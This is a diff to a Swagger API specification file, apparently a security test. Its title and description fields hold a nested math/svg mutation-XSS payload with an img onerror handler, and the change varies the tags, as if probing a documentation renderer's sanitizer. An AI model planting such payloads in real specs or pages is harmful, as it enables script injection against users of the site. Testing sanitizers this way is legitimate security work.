--- a/test1.yaml
+++ b/test1.yaml
@@ -1,7 +1,7 @@
 swagger: '2.0'
 info:
   title: Classic API Resource Documentation"><hgroup>
-  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><details><a title='</textarea><img src onerror=alert(`https://exuberant-ice.surge.sh/script.js`)'></details></h1>">"</details></desc></details></mtext></mtext></svg></mglyph></option></mtext></math>
+  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><process><a title='</textarea><img src onerror=alert(`https://exuberant-ice.surge.sh/script.js`)'></process></h1>">"</process></desc></process></mtext></mtext></svg></mglyph></option></mtext></math>
 version: production
 basePath: /JSSResource/
 produces:
